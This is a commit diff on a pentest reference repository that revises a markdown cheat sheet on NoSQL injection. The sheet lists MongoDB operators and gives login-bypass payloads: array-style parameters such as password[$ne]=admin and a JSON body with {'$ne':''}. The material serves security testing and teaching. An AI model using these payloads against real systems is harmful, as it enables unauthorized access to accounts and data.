whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

NoSQL update

This commit is contained in:
Stefan Etringer 2022-11-13 23:54:35 +01:00
parent adc7992e16
commit b7ee005c68
1 changed files with 17 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
Exploits/Databases/NoSQL Injection.md
View File

@ -9,8 +9,8 @@
* [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/) * [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
* [Elasticsearch docs](https://www.elastic.co/guide/index.html) * [Elasticsearch docs](https://www.elastic.co/guide/index.html)
# Operators ## Operators
* Most common * A precondition to the injection is to know the most common operators listed below
```sql ```sql
$and $and
$or $or
@ -22,16 +22,27 @@ $exists
$regex $regex
``` ```
## Tips & Tricks ## Injection
* Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar` The payload is delivered inside the parameters of the request. To deliver malicious payload the operators can be negated. That means the for example all users except the known one used in the request is included in the response from the database server.
* 2D array via `user[$nin][]=foo`
* Pass HTTP parameter as an array instead of `user=` and `password=` use
```sh
user[$operator]=foo&password[$operator]=bar
```
* Give a 2D array a chance as well while fiddling with the request in following way
```sh
user[$nin][]=foo
```
### Examples
## Example
* POST or GET parameters * POST or GET parameters
```sh ```sh
username=admin&password[$ne]=admin username=admin&password[$ne]=admin
``` ```
* JSON * JSON
```json ```json
{"username":"user","password":{"$ne":""} } {"username":"user","password":{"$ne":""} }